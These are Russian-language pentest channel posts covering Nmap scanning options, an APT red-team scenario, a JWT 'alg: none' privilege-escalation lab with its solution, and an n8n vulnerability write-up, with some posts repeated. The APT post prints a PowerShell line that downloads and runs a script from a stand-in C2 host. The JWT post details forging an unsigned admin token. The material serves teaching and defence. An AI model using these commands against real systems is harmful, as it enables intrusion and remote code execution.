Что такое NSE🔍
Nmap Scripting Engine (NSE) - это встроенный интерпретатор скриптов на языке Lua, который превращает Nmap из простого сканера портов в полноценный инструмент активной разведки, эксплуатации уязвимостей и пост-эксплуатации.
Если просто: NSE - это когда ты говоришь Nmap не просто «посмотри, открыт ли порт», а «посмотри, открыт ли порт и заодно расскажи всё грязное, что про него знаешь».😁
При использовании NSE Nmap перестаёт быть просто сканером портов, а превращается в мини-фреймворк для автоматизированного пентеста.
Скрипты NSE умеют:
✅Определять точные версии и патч-левелы
✅Искать известные уязвимости (в том числе свежие)
✅Перечислять пользователей/ресурсы
✅Брутфорсить (да, до сих пор эффективно в определённых сценариях)
✅Собирать тонну дополнительной информации
✅Иногда даже эксплуатировать (очень аккуратно и редко)
Какие категории скриптов NSE необходимо изучить пентестеру:
--script default # самые безопасные и полезные (то, что запускается через -sC)
--script safe # только безопасные (не ломают ничего)
--script vuln # ищет известные уязвимости
--script discovery # находит скрытые штуки в сети
--script brute # пытается брутфорсить пароли
--script http-* # всё, что связано с вебом
--script smb-* # всё, что связано с Windows-шарами
--script ssl-* / tls-* # всё про сертификаты и шифрование
NSE - это "умные дополнения" к Nmap, которые умеют делать гораздо больше, чем просто находить открытые порты.
Обычный Nmap говорит: «Есть дверь».
NSE добавляет: «Дверь старая, замок слабый, щель большая, с той стороны кто-то громко представляется Windows Server 2012, и похоже, что кто-то забыл закрыть одно окошко с надписью MS17-010».😈
Nmap Scripting Engine (NSE) - это встроенный интерпретатор скриптов на языке Lua, который превращает Nmap из простого сканера портов в полноценный инструмент активной разведки, эксплуатации уязвимостей и пост-эксплуатации.
Если просто: NSE - это когда ты говоришь Nmap не просто «посмотри, открыт ли порт», а «посмотри, открыт ли порт и заодно расскажи всё грязное, что про него знаешь».😁
При использовании NSE Nmap перестаёт быть просто сканером портов, а превращается в мини-фреймворк для автоматизированного пентеста.
Скрипты NSE умеют:
✅Определять точные версии и патч-левелы
✅Искать известные уязвимости (в том числе свежие)
✅Перечислять пользователей/ресурсы
✅Брутфорсить (да, до сих пор эффективно в определённых сценариях)
✅Собирать тонну дополнительной информации
✅Иногда даже эксплуатировать (очень аккуратно и редко)
Какие категории скриптов NSE необходимо изучить пентестеру:
--script safe # только безопасные (не ломают ничего)
--script vuln # ищет известные уязвимости
--script discovery # находит скрытые штуки в сети
--script brute # пытается брутфорсить пароли
--script http-* # всё, что связано с вебом
--script smb-* # всё, что связано с Windows-шарами
--script ssl-* / tls-* # всё про сертификаты и шифрование
NSE - это "умные дополнения" к Nmap, которые умеют делать гораздо больше, чем просто находить открытые порты.
Обычный Nmap говорит: «Есть дверь».
NSE добавляет: «Дверь старая, замок слабый, щель большая, с той стороны кто-то громко представляется Windows Server 2012, и похоже, что кто-то забыл закрыть одно окошко с надписью MS17-010».😈
❤6🔥6👌1
Обнаружение живых хостов (Host Discovery) - первый и самый важный шаг в разведке сети🔍
Представь, что ты пришёл в огромный многоквартирный дом (это сеть с тысячами IP-адресов). Тебе нужно понять, в каких квартирах вообще кто-то живёт, прежде чем стучать во все двери подряд и спрашивать "а можно посмотреть, что у вас внутри?".🧐
Host Discovery - это быстрый способ обойти дом и крикнуть "эй, есть кто живой?" только тем, кто может ответить.😁
В каких ситуациях это может пригодиться?
1) Ты подключился к корпоративной Wi-Fi в офисе → Находишь все активные компьютеры, принтеры, NAS, IP-телефоны
2) Пентест внешнего периметра компании → Ищешь, какие публичные IP живые (часто в /24 или /16)
3) Атака на внутреннюю сеть (Red Team) → Быстро составляешь карту живых хостов перед атакой
✨Несколько опций:
-sL перечисляет все IP-адреса из цели, не отправляя ни одного пакета
-sn (ранее -sP) выполняет только host discovery без сканирования портов
-PE классический ping
-PP запрос времени (в современных сетях работает редко)
-PM запрос маски подсети
-PS[порты] отправляет TCP SYN-пакет(ы) на указанные порты
-PA[порты] отправляет TCP ACK-пакет(ы)
-PU[порты] отправляет UDP-пакет на указанный порт
Примеры команд для host discovery:
- nmap -sn -PE -PS22,80,443,445,3389 -PA80,443 -PU53,161 -T4 target # не сканирует порты - только проверяет, какие IP-адреса отвечают (т.е. активны), и делает это максимально разными способами одновременно
- nmap -Pn -p 80,443,3389 --open target # типичная команда для быстрого и минималистичного поиска открытых веб-серверов и RDP на конкретном хосте или домене, особенно когда обычный пинг полностью блокируется файрволом
Как вы думаете, что происходит в запросе?👇
sudo nmap -sn -PE -PP -PM - PS21,22,23,80,443,445,3389 -PA80,443 -PU53,161 -T4 10.10.0.0/16 -oG - \
| awk '/Status: Up/{print $2}' \
| tee live-hosts.txt
Пишите свои ответы в комментариях!✅
#Nmap #hostdiscovery #CканированиеСети #Пентест #RedTeam #Кибербезопасность #CyberSecurity #этичныйХакинг #NetworkSecurity #PingScan
Представь, что ты пришёл в огромный многоквартирный дом (это сеть с тысячами IP-адресов). Тебе нужно понять, в каких квартирах вообще кто-то живёт, прежде чем стучать во все двери подряд и спрашивать "а можно посмотреть, что у вас внутри?".🧐
Host Discovery - это быстрый способ обойти дом и крикнуть "эй, есть кто живой?" только тем, кто может ответить.😁
В каких ситуациях это может пригодиться?
1) Ты подключился к корпоративной Wi-Fi в офисе → Находишь все активные компьютеры, принтеры, NAS, IP-телефоны
2) Пентест внешнего периметра компании → Ищешь, какие публичные IP живые (часто в /24 или /16)
3) Атака на внутреннюю сеть (Red Team) → Быстро составляешь карту живых хостов перед атакой
✨Несколько опций:
-sL перечисляет все IP-адреса из цели, не отправляя ни одного пакета
-sn (ранее -sP) выполняет только host discovery без сканирования портов
-PE классический ping
-PP запрос времени (в современных сетях работает редко)
-PM запрос маски подсети
-PS[порты] отправляет TCP SYN-пакет(ы) на указанные порты
-PA[порты] отправляет TCP ACK-пакет(ы)
-PU[порты] отправляет UDP-пакет на указанный порт
Примеры команд для host discovery:
Как вы думаете, что происходит в запросе?👇
| awk '/Status: Up/{print $2}' \
| tee live-hosts.txt
Пишите свои ответы в комментариях!✅
#Nmap #hostdiscovery #CканированиеСети #Пентест #RedTeam #Кибербезопасность #CyberSecurity #этичныйХакинг #NetworkSecurity #PingScan
2🔥15❤2🙏1
🔒 Вступление в Pentest Community | Private
Иногда полезно напомнить,
что у нас есть не только публичный канал,
но и закрытое сообщество 👇
Pentest Community | Private — это пространство,
где можно не просто читать посты,
а развиваться через практику и общение.
━━━━━━━━━━━━━━━━━━
🧠 ЧТО ВНУТРИ ПРИВАТА
━━━━━━━━━━━━━━━━━━
• разборы реальных кейсов
• практика и CTF
• OSINT и web-пентест
• инструменты и методология
• вопросы с собеседований
• обсуждения и помощь
Здесь можно:
• задавать любые вопросы
• разбирать непонятные моменты
• обсуждать статьи и кейсы
• расти вместе с единомышленниками
Сообщество можно смело рассматривать
как замену ментору 🤝
По вопросам вступления и доступа:
— пишите администратору в личные сообщения 👇
👉 @faroeman
или сразу (тык - тык)
https://t.iss.one/tribute/app?startapp=sIBO
Если чувствуете, что готовы идти глубже —
будем рады видеть вас внутри 🛡
Иногда полезно напомнить,
что у нас есть не только публичный канал,
но и закрытое сообщество 👇
Pentest Community | Private — это пространство,
где можно не просто читать посты,
а развиваться через практику и общение.
━━━━━━━━━━━━━━━━━━
🧠 ЧТО ВНУТРИ ПРИВАТА
━━━━━━━━━━━━━━━━━━
• разборы реальных кейсов
• практика и CTF
• OSINT и web-пентест
• инструменты и методология
• вопросы с собеседований
• обсуждения и помощь
Здесь можно:
• задавать любые вопросы
• разбирать непонятные моменты
• обсуждать статьи и кейсы
• расти вместе с единомышленниками
Сообщество можно смело рассматривать
как замену ментору 🤝
По вопросам вступления и доступа:
— пишите администратору в личные сообщения 👇
👉 @faroeman
или сразу (тык - тык)
https://t.iss.one/tribute/app?startapp=sIBO
Если чувствуете, что готовы идти глубже —
будем рады видеть вас внутри 🛡
🔥1
🔍Service & Version Detection (Обнаружение служб и их версий) - технология, которая позволяет Nmap не просто определить, открыт ли порт, а понять:
✔️Какая именно служба (сервис) работает на этом порту
✔️Какое приложение её предоставляет
✔️Какой номер версии этого приложения
✔️Иногда - дополнительную информацию (hostname, тип устройства, ОС семейство и т.д.)
CVE-2025-14847, известная как MongoBleed, - это яркий пример того, почему Service & Version Detection (особенно через Nmap с флагом -sV) остаётся одним из самых мощных и часто решающих шагов в пентесте, разведке и аудите безопасности. Уязвимость была раскрыта 19 декабря 2025 года и почти сразу получила статус actively exploited in the wild (CISA KEV, Unit 42, Wiz и другие подтвердили массовые атаки уже к концу декабря).
❗️Параметры Service & Version Detection в Nmap (флаг -sV и связанные опции) позволяют управлять тем, насколько глубоко и агрессивно Nmap будет определять службы и их версии на открытых портах.
Примеры команд:
nmap -sV target # включает стандартное определение версий (интенсивность по умолчанию = 7)
nmap -sV --version-intensity 9 target # устанавливает уровень интенсивности (сколько проб будет отправлено)
nmap -sV --version-light target # эквивалент --version-intensity 2 - только самые вероятные пробы
nmap -sV --version-all target # эквивалент --version-intensity 9 - пробует все пробы из базы
nmap -A target # включает -sV + OS detection + default NSE scripts + traceroute
Начинай всегда с -sV (или -sV --version-light). Если версия не определилась или выглядит подозрительно - поднимай до --version-all или --version-intensity 9. Если скан большой (тысячи хостов) - используй --version-light, чтобы не тратить часы.😉
#Nmap #ServiceDetection #MongoBleed #CVE202514847 #MongoDB #Пентест #Кибербезопасность #Уязвимость
✔️Какая именно служба (сервис) работает на этом порту
✔️Какое приложение её предоставляет
✔️Какой номер версии этого приложения
✔️Иногда - дополнительную информацию (hostname, тип устройства, ОС семейство и т.д.)
CVE-2025-14847, известная как MongoBleed, - это яркий пример того, почему Service & Version Detection (особенно через Nmap с флагом -sV) остаётся одним из самых мощных и часто решающих шагов в пентесте, разведке и аудите безопасности. Уязвимость была раскрыта 19 декабря 2025 года и почти сразу получила статус actively exploited in the wild (CISA KEV, Unit 42, Wiz и другие подтвердили массовые атаки уже к концу декабря).
❗️Параметры Service & Version Detection в Nmap (флаг -sV и связанные опции) позволяют управлять тем, насколько глубоко и агрессивно Nmap будет определять службы и их версии на открытых портах.
Примеры команд:
nmap -sV target # включает стандартное определение версий (интенсивность по умолчанию = 7)
nmap -sV --version-intensity 9 target # устанавливает уровень интенсивности (сколько проб будет отправлено)
nmap -sV --version-light target # эквивалент --version-intensity 2 - только самые вероятные пробы
nmap -sV --version-all target # эквивалент --version-intensity 9 - пробует все пробы из базы
nmap -A target # включает -sV + OS detection + default NSE scripts + traceroute
Начинай всегда с -sV (или -sV --version-light). Если версия не определилась или выглядит подозрительно - поднимай до --version-all или --version-intensity 9. Если скан большой (тысячи хостов) - используй --version-light, чтобы не тратить часы.😉
#Nmap #ServiceDetection #MongoBleed #CVE202514847 #MongoDB #Пентест #Кибербезопасность #Уязвимость
❤4🙏2
Симуляция APT-атаки с использованием Nmap☑️
APT (Advanced Persistent Threat) - это не быстрый ransomware или массовый фишинг, а долгосрочная, скрытная, целенаправленная операция. Симуляция такой атаки - один из самых эффективных способов проверить, насколько твоя защита (или защита клиента) готова к реальным угрозам.
🟢Почему симуляция APT важнее обычного пентеста?
➖Обычный пентест: находит уязвимости → даёт отчёт.
➖Симуляция APT: имитирует полный kill chain реального актора → показывает, сколько времени пройдёт до детекта, что пропустит EDR/SIEM/NGFW, как долго можно оставаться незамеченным.
Пример сценария
Цель: корпоративная сеть с AD, Azure, VPN.
1)Разведка (Reconnaissance)
OSINT (LinkedIn, Shodan) + тихий Nmap:
nmap -sS -T1 -Pn -g 53 --data-length 20 external-range
2)Первоначальный доступ (Initial Access)
Целевой фишинг (spear-phishing) с вложением .docx (макрос) или эксплуатация 0-day в VPN/Exchange.
3)Выполнение и закрепление (Execution & Persistence)
PowerShell-beacon: powershell -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://c2/launcher.ps1')"
Планировщик задач (Scheduled Task) + использование украденных облачных учётных данных.
4)Повышение привилегий (Privilege Escalation)
Kerberoasting → взлом хэша → получение прав Domain Admin.
5)Боковое перемещение (Lateral Movement)
Pass-the-Hash → RDP / WinRM / SMB.
6)Дамп учётных данных (Credential Dumping)
Mimikatz / dumpert (дамп LSASS) + DCSync.
7)Обнаружение (Discovery)
BloodHound / PowerView → построение карты Active Directory.
8)Эксфильтрация (Exfiltration)
Медленный вынос данных через DNS-туннелирование / OneDrive / Google Drive / стеганографию в изображениях.
🔴Red team показывает шаг → 🔵Blue team сразу проверяет детект → 🟣Purple team тюнит правила на лету.
Симуляция APT - лучший способ превратить защиту из «на бумаге» в реально работающую.😉
#пентест #APTатака #этичныйхакинг #infosec #nmap
APT (Advanced Persistent Threat) - это не быстрый ransomware или массовый фишинг, а долгосрочная, скрытная, целенаправленная операция. Симуляция такой атаки - один из самых эффективных способов проверить, насколько твоя защита (или защита клиента) готова к реальным угрозам.
🟢Почему симуляция APT важнее обычного пентеста?
➖Обычный пентест: находит уязвимости → даёт отчёт.
➖Симуляция APT: имитирует полный kill chain реального актора → показывает, сколько времени пройдёт до детекта, что пропустит EDR/SIEM/NGFW, как долго можно оставаться незамеченным.
Пример сценария
Цель: корпоративная сеть с AD, Azure, VPN.
1)Разведка (Reconnaissance)
OSINT (LinkedIn, Shodan) + тихий Nmap:
2)Первоначальный доступ (Initial Access)
Целевой фишинг (spear-phishing) с вложением .docx (макрос) или эксплуатация 0-day в VPN/Exchange.
3)Выполнение и закрепление (Execution & Persistence)
PowerShell-beacon: powershell -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://c2/launcher.ps1')"
Планировщик задач (Scheduled Task) + использование украденных облачных учётных данных.
4)Повышение привилегий (Privilege Escalation)
Kerberoasting → взлом хэша → получение прав Domain Admin.
5)Боковое перемещение (Lateral Movement)
Pass-the-Hash → RDP / WinRM / SMB.
6)Дамп учётных данных (Credential Dumping)
Mimikatz / dumpert (дамп LSASS) + DCSync.
7)Обнаружение (Discovery)
BloodHound / PowerView → построение карты Active Directory.
8)Эксфильтрация (Exfiltration)
Медленный вынос данных через DNS-туннелирование / OneDrive / Google Drive / стеганографию в изображениях.
🔴Red team показывает шаг → 🔵Blue team сразу проверяет детект → 🟣Purple team тюнит правила на лету.
Симуляция APT - лучший способ превратить защиту из «на бумаге» в реально работающую.😉
#пентест #APTатака #этичныйхакинг #infosec #nmap
😵💫 Понедельник — день тяжёлый…
Но это не повод раскачиваться 😈
Пора включаться в работу и немного размять мозги.
Поиграем?
Проверим, кто здесь самый активный и внимательный 👇
---
🧠 Мини-викторина для пентестеров
Отвечаем в комментариях или реакцией.
---
❓ Вопрос 1
Какой HTTP-метод чаще всего используют при проверке IDOR?
A) GET
B) POST
C) DELETE
D) HEAD
---
❓ Вопрос 2
Где в Burp Suite удобнее всего вручную тестировать параметры запроса?
A) Proxy
B) Intruder
C) Repeater
D) Scanner
---
❓ Вопрос 3
Что из этого НЕ является уязвимостью?
A) XSS
B) SQL Injection
C) CSRF
D) Base64
---
❓ Вопрос 4
Какой порт используется по умолчанию для HTTPS?
A) 21
B) 22
C) 80
D) 443
---
🎯 Формат ответа
Пишите в комментариях, например:
1-A / 2-C / 3-D / 4-D
Или просто ставьте реакцию,
если готовы к рабочей неделе 💪
Поехали 🚀
Но это не повод раскачиваться 😈
Пора включаться в работу и немного размять мозги.
Поиграем?
Проверим, кто здесь самый активный и внимательный 👇
---
🧠 Мини-викторина для пентестеров
Отвечаем в комментариях или реакцией.
---
❓ Вопрос 1
Какой HTTP-метод чаще всего используют при проверке IDOR?
A) GET
B) POST
C) DELETE
D) HEAD
---
❓ Вопрос 2
Где в Burp Suite удобнее всего вручную тестировать параметры запроса?
A) Proxy
B) Intruder
C) Repeater
D) Scanner
---
❓ Вопрос 3
Что из этого НЕ является уязвимостью?
A) XSS
B) SQL Injection
C) CSRF
D) Base64
---
❓ Вопрос 4
Какой порт используется по умолчанию для HTTPS?
A) 21
B) 22
C) 80
D) 443
---
🎯 Формат ответа
Пишите в комментариях, например:
1-A / 2-C / 3-D / 4-D
Или просто ставьте реакцию,
если готовы к рабочей неделе 💪
Поехали 🚀
🔥1
🧠 Ответы на мини-викторину
Разбираем, кто был в теме 👇
---
❓ Вопрос 1
Какой HTTP-метод чаще всего используют для проверки IDOR?
✅ A) GET
> Чаще всего IDOR проверяется на чтении ресурсов
> (профили, заказы, файлы), которые дергаются через GET-запросы.
---
❓ Вопрос 2
Где в Burp Suite удобнее всего вручную тестировать параметры запроса?
✅ C) Repeater
> Repeater — лучший инструмент для ручной проверки логики,
> параметров, токенов и прав доступа.
---
❓ Вопрос 3
Что из этого НЕ является уязвимостью?
✅ D) Base64
> Base64 — это просто кодирование.
> Ни защита, ни уязвимость.
---
❓ Вопрос 4
Какой порт по умолчанию у HTTPS?
✅ D) 443
---
🎯 Итоги
- 4/4 — красавчик, ты уже в рабочем режиме 💪
- 2–3 — нормально, втягиваемся
- 0–1 — значит, пора активнее подключаться к практике 😉
Хочешь больше практики? Заскакивай к нам в приватный канал 🔥
🛡 Pentest Community | Private
Разбираем, кто был в теме 👇
---
❓ Вопрос 1
Какой HTTP-метод чаще всего используют для проверки IDOR?
✅ A) GET
> Чаще всего IDOR проверяется на чтении ресурсов
> (профили, заказы, файлы), которые дергаются через GET-запросы.
---
❓ Вопрос 2
Где в Burp Suite удобнее всего вручную тестировать параметры запроса?
✅ C) Repeater
> Repeater — лучший инструмент для ручной проверки логики,
> параметров, токенов и прав доступа.
---
❓ Вопрос 3
Что из этого НЕ является уязвимостью?
✅ D) Base64
> Base64 — это просто кодирование.
> Ни защита, ни уязвимость.
---
❓ Вопрос 4
Какой порт по умолчанию у HTTPS?
✅ D) 443
---
🎯 Итоги
- 4/4 — красавчик, ты уже в рабочем режиме 💪
- 2–3 — нормально, втягиваемся
- 0–1 — значит, пора активнее подключаться к практике 😉
Хочешь больше практики? Заскакивай к нам в приватный канал 🔥
🛡 Pentest Community | Private
❤4🔥2👌1
🧪 Практика | JWT: я не админ… или всё-таки админ?
Разберём ситуацию, максимально приближенную к реальному веб-пентесту.
━━━━━━━━━━━━━━━━━━
📌 ИСХОДНЫЕ ДАННЫЕ
━━━━━━━━━━━━━━━━━━
В ходе тестирования веб-приложения
в запросах был обнаружен следующий токен:
Известно:
• приложение использует JWT для авторизации
• токен передаётся в заголовке Authorization
• доступ получен как обычный пользователь
━━━━━━━━━━━━━━━━━━
🎯 ЗАДАЧА
━━━━━━━━━━━━━━━━━━
Понять, можно ли получить расширенные права
и какие гипотезы здесь стоит проверить.
━━━━━━━━━━━━━━━━━━
❓ ВОПРОСЫ
━━━━━━━━━━━━━━━━━━
• Как определить, что это именно JWT?
• Что в этом токене выглядит подозрительно?
• Какие изменения имеет смысл попробовать?
• Где здесь потенциальный риск для приложения?
━━━━━━━━━━━━━━━━━━
💡 ПОДСКАЗКИ
━━━━━━━━━━━━━━━━━━
• JWT состоит из частей, разделённых точкой
• обрати внимание на поле
• подумай, как сервер проверяет подпись
━━━━━━━━━━━━━━━━━━
💬 КАК ОТВЕЧАТЬ
━━━━━━━━━━━━━━━━━━
В комментариях:
• какие гипотезы возникли
• что бы вы проверяли первым
• спойлеры — под спойлер 👀
🕘 Вечером выложим подробный разбор.
Хештеги: #practice
Разберём ситуацию, максимально приближенную к реальному веб-пентесту.
━━━━━━━━━━━━━━━━━━
📌 ИСХОДНЫЕ ДАННЫЕ
━━━━━━━━━━━━━━━━━━
В ходе тестирования веб-приложения
в запросах был обнаружен следующий токен:
eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiZ3Vlc3QiLCJyb2xlIjoidXNlciIsImFkbWluIjpmYWxzZX0.Известно:
• приложение использует JWT для авторизации
• токен передаётся в заголовке Authorization
• доступ получен как обычный пользователь
━━━━━━━━━━━━━━━━━━
🎯 ЗАДАЧА
━━━━━━━━━━━━━━━━━━
Понять, можно ли получить расширенные права
и какие гипотезы здесь стоит проверить.
━━━━━━━━━━━━━━━━━━
❓ ВОПРОСЫ
━━━━━━━━━━━━━━━━━━
• Как определить, что это именно JWT?
• Что в этом токене выглядит подозрительно?
• Какие изменения имеет смысл попробовать?
• Где здесь потенциальный риск для приложения?
━━━━━━━━━━━━━━━━━━
💡 ПОДСКАЗКИ
━━━━━━━━━━━━━━━━━━
• обрати внимание на поле
alg• подумай, как сервер проверяет подпись
━━━━━━━━━━━━━━━━━━
💬 КАК ОТВЕЧАТЬ
━━━━━━━━━━━━━━━━━━
В комментариях:
• какие гипотезы возникли
• что бы вы проверяли первым
• спойлеры — под спойлер 👀
🕘 Вечером выложим подробный разбор.
Хештеги: #practice
1❤1
🧠 Практический разбор: что делать с этим JWT
Сегодня разбираем реальный кейс из веб-пентеста и смотрим,
как с таким JWT работает пентестер на практике — шаг за шагом.
━━━━━━━━━━━━━━━━━━
📌 ИСХОДНАЯ СТРОКА
━━━━━━━━━━━━━━━━━━
━━━━━━━━━━━━━━━━━━
🔍 ШАГ 1. ПОНЯТЬ, ЧТО ЭТО JWT
━━━━━━━━━━━━━━━━━━
JWT всегда имеет формат:
header.payload.signature
В данном случае:
• есть 2 точки
• третья часть пустая (после последней точки)
👉 Уже здесь видно:
подписи нет.
━━━━━━━━━━━━━━━━━━
🔓 ШАГ 2. ДЕКОДИРОВАТЬ HEADER И PAYLOAD
━━━━━━━━━━━━━━━━━━
Используем любой удобный инструмент:
• jwt.io
• CyberChef
• Burp Decoder
• CLI
После декодирования получаем:
Header:
{
"alg": "none",
"typ": "JWT"
}
Payload:
{
"user": "guest",
"role": "user",
"admin": false
}
━━━━━━━━━━━━━━━━━━
🚩 ШАГ 3. КЛЮЧЕВОЙ RED FLAG
━━━━━━━━━━━━━━━━━━
Поле:
"alg": "none"
Это критически важный момент.
Что это означает:
• токен не подписан
• сервер может не проверять целостность
• клиент потенциально может менять payload
❗️ Это не криптографическая уязвимость
❗️ Это ошибка доверия к клиенту
━━━━━━━━━━━━━━━━━━
🧠 ШАГ 4. ФОРМИРУЕМ ГИПОТЕЗУ
━━━━━━━━━━━━━━━━━━
Правильный вопрос пентестера:
> А что если сервер просто верит данным из payload?
Если это так — возможны:
• повышение роли
• включение admin-доступа
• доступ к чужим данным
━━━━━━━━━━━━━━━━━━
🧪 ШАГ 5. ЧТО МЕНЯТЬ В ТОКЕНЕ
━━━━━━━━━━━━━━━━━━
Меняем только payload, например, на:
{
"user": "guest",
"role": "admin",
"admin": true
}
⚠️ Header оставляем без изменений:
{ "alg": "none", "typ": "JWT" }
━━━━━━━━━━━━━━━━━━
🔁 ШАГ 6. ПЕРЕСОБРАТЬ JWT
━━━━━━━━━━━━━━━━━━
1) Кодируем header в Base64URL
2) Кодируем payload в Base64URL
3) Склеиваем:
header_base64.payload_base64.
⚠️ Подпись не добавляем
━━━━━━━━━━━━━━━━━━
🚀 ШАГ 7. ОТПРАВИТЬ В ПРИЛОЖЕНИЕ
━━━━━━━━━━━━━━━━━━
Передаём токен:
• в
• или в cookie (если используется)
Дальше ничего не ломаем, а наблюдаем:
• изменился ли уровень доступа
• появились ли новые функции
• открылись ли админские эндпоинты
• изменились ли ответы сервера
━━━━━━━━━━━━━━━━━━
✅ ШАГ 8. КАК ПОНЯТЬ, ЧТО УЯЗВИМОСТЬ ЕСТЬ
━━━━━━━━━━━━━━━━━━
Уязвимость подтверждена, если:
• сервер принимает изменённый токен
• подпись не проверяется
• выдаётся доступ по новым правам
Тип уязвимости:
JWT Authentication Bypass / Privilege Escalation
━━━━━━━━━━━━━━━━━━
📌 ВАЖНО ПОНЯТЬ
━━━━━━━━━━━━━━━━━━
• вы не ломаете JWT
• вы используете ошибку реализации
• проблема не в токене, а в сервере
• это реальный баг, который встречается в проде
━━━━━━━━━━━━━━━━━━
📝 КАК ЭТО ОПИСЫВАЮТ В ОТЧЁТЕ
━━━━━━━━━━━━━━━━━━
Тип: Improper JWT Validation
Риск: Privilege Escalation
Причина:
Влияние: доступ к защищённым функциям
━━━━━━━━━━━━━━━━━━
🎯 ВЫВОД ПЕНТЕСТЕРА
━━━━━━━━━━━━━━━━━━
Если сервер доверяет клиенту —
клиент этим воспользуется.
JWT — это контейнер данных,
а не гарантия безопасности.
Сегодня разбираем реальный кейс из веб-пентеста и смотрим,
как с таким JWT работает пентестер на практике — шаг за шагом.
━━━━━━━━━━━━━━━━━━
📌 ИСХОДНАЯ СТРОКА
━━━━━━━━━━━━━━━━━━
eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiZ3Vlc3QiLCJyb2xlIjoidXNlciIsImFkbWluIjpmYWxzZX0.━━━━━━━━━━━━━━━━━━
🔍 ШАГ 1. ПОНЯТЬ, ЧТО ЭТО JWT
━━━━━━━━━━━━━━━━━━
JWT всегда имеет формат:
header.payload.signature
В данном случае:
• есть 2 точки
• третья часть пустая (после последней точки)
👉 Уже здесь видно:
подписи нет.
━━━━━━━━━━━━━━━━━━
🔓 ШАГ 2. ДЕКОДИРОВАТЬ HEADER И PAYLOAD
━━━━━━━━━━━━━━━━━━
Используем любой удобный инструмент:
• jwt.io
• CyberChef
• Burp Decoder
• CLI
После декодирования получаем:
Header:
{
"alg": "none",
"typ": "JWT"
}
Payload:
{
"user": "guest",
"role": "user",
"admin": false
}
━━━━━━━━━━━━━━━━━━
🚩 ШАГ 3. КЛЮЧЕВОЙ RED FLAG
━━━━━━━━━━━━━━━━━━
Поле:
"alg": "none"
Это критически важный момент.
Что это означает:
• токен не подписан
• сервер может не проверять целостность
• клиент потенциально может менять payload
❗️ Это не криптографическая уязвимость
❗️ Это ошибка доверия к клиенту
━━━━━━━━━━━━━━━━━━
🧠 ШАГ 4. ФОРМИРУЕМ ГИПОТЕЗУ
━━━━━━━━━━━━━━━━━━
Правильный вопрос пентестера:
> А что если сервер просто верит данным из payload?
Если это так — возможны:
• повышение роли
• включение admin-доступа
• доступ к чужим данным
━━━━━━━━━━━━━━━━━━
🧪 ШАГ 5. ЧТО МЕНЯТЬ В ТОКЕНЕ
━━━━━━━━━━━━━━━━━━
Меняем только payload, например, на:
{
"user": "guest",
"role": "admin",
"admin": true
}
⚠️ Header оставляем без изменений:
{ "alg": "none", "typ": "JWT" }
━━━━━━━━━━━━━━━━━━
🔁 ШАГ 6. ПЕРЕСОБРАТЬ JWT
━━━━━━━━━━━━━━━━━━
1) Кодируем header в Base64URL
2) Кодируем payload в Base64URL
3) Склеиваем:
header_base64.payload_base64.
⚠️ Подпись не добавляем
━━━━━━━━━━━━━━━━━━
🚀 ШАГ 7. ОТПРАВИТЬ В ПРИЛОЖЕНИЕ
━━━━━━━━━━━━━━━━━━
Передаём токен:
• в
Authorization: Bearer <token>• или в cookie (если используется)
Дальше ничего не ломаем, а наблюдаем:
• изменился ли уровень доступа
• появились ли новые функции
• открылись ли админские эндпоинты
• изменились ли ответы сервера
━━━━━━━━━━━━━━━━━━
✅ ШАГ 8. КАК ПОНЯТЬ, ЧТО УЯЗВИМОСТЬ ЕСТЬ
━━━━━━━━━━━━━━━━━━
Уязвимость подтверждена, если:
• сервер принимает изменённый токен
• подпись не проверяется
• выдаётся доступ по новым правам
Тип уязвимости:
JWT Authentication Bypass / Privilege Escalation
━━━━━━━━━━━━━━━━━━
📌 ВАЖНО ПОНЯТЬ
━━━━━━━━━━━━━━━━━━
• вы не ломаете JWT
• вы используете ошибку реализации
• проблема не в токене, а в сервере
• это реальный баг, который встречается в проде
━━━━━━━━━━━━━━━━━━
📝 КАК ЭТО ОПИСЫВАЮТ В ОТЧЁТЕ
━━━━━━━━━━━━━━━━━━
Тип: Improper JWT Validation
Риск: Privilege Escalation
Причина:
alg: none accepted Влияние: доступ к защищённым функциям
━━━━━━━━━━━━━━━━━━
🎯 ВЫВОД ПЕНТЕСТЕРА
━━━━━━━━━━━━━━━━━━
Если сервер доверяет клиенту —
клиент этим воспользуется.
JWT — это контейнер данных,
а не гарантия безопасности.
🔥12❤3
# Уязвимость января 2026: Ni8mare (CVE-2026-21858) в n8n — CVSS 10.0, unauth RCE 🔥💀
Братья по ред тиму, это уже классика 2026: automation-инструменты превращаются в новую "Log4Shell".
CVE-2026-21858 (кодовое имя Ni8mare) — критическая дыра в n8n (open-source Zapier на стероидах, особенно популярен для AI-воркфлоу).
Что сломалось?
- Content-Type confusion в обработке webhook/form с file upload.
- Атакующий шлёт запрос НЕ как multipart/form-data, а как JSON (или другой тип) → парсер верит req.body.files → перезаписывает внутренние объекты.
- Итог: arbitrary file read (чтение /etc/passwd, .env, config, encryption keys, JWT secrets, базы creds).
Цепочка до full RCE (самый худший сценарий):
1. Читаем конфиг → достаём encryption key + admin creds / session tokens.
2. Форжим admin JWT → логинимся как владелец.
3. Chain с expression injection (часто CVE-2025-68613 или CVE-2026-21877) → sandbox bypass → RCE на хосте.
Impact:
- Self-hosted n8n с публичными Form Trigger / Webhook → game over.
- ~100k+ exposed инстансов (Cyera/Shodan данные).
- Многие юзают n8n для AI-агентов, internal автоматизаций, creds от AWS/GCP/Slack/DB → pivot везде.
- Активно эксплуатируется в wild (CISA пока не в KEV, но reports летят).
Affected версии:
≤ 1.120.x (конкретно от 1.65.0 и выше, но фикс в 1.121.0)
Фикс вышел: ноябрь 2025 (!), публичный PoC — январь 2026. Многие до сих пор не обновились.
Как фиксить (urgent!):
1. Обнови до 1.121.0+ (лучше latest 1.123.x или 2.x branch).
2. Проверь exposure: /healthz, /rest/workflows, fingerprint "n8n" в Shodan/Censys.
3. Отключи публичные Form/Webhook без auth или за firewall/reverse proxy с жёсткой валидацией Content-Type.
4. Запусти сканер от n8n community: [CVE-2026-21858 Scanner workflow](https://community.n8n.io/t/security-advisory-security-vulnerability-in-n8n-versions-1-65-1-120-4/247305).
5. Mitigation (если update нельзя): выруби все Form nodes с file upload.
Для пентестеров / ред тимеров:
- Ищи: Shodan "n8n" + version <1.121
- Тестируй: curl с custom Content-Type + JSON body → arbitrary file read (/n8n/.n8n/config или /.env).
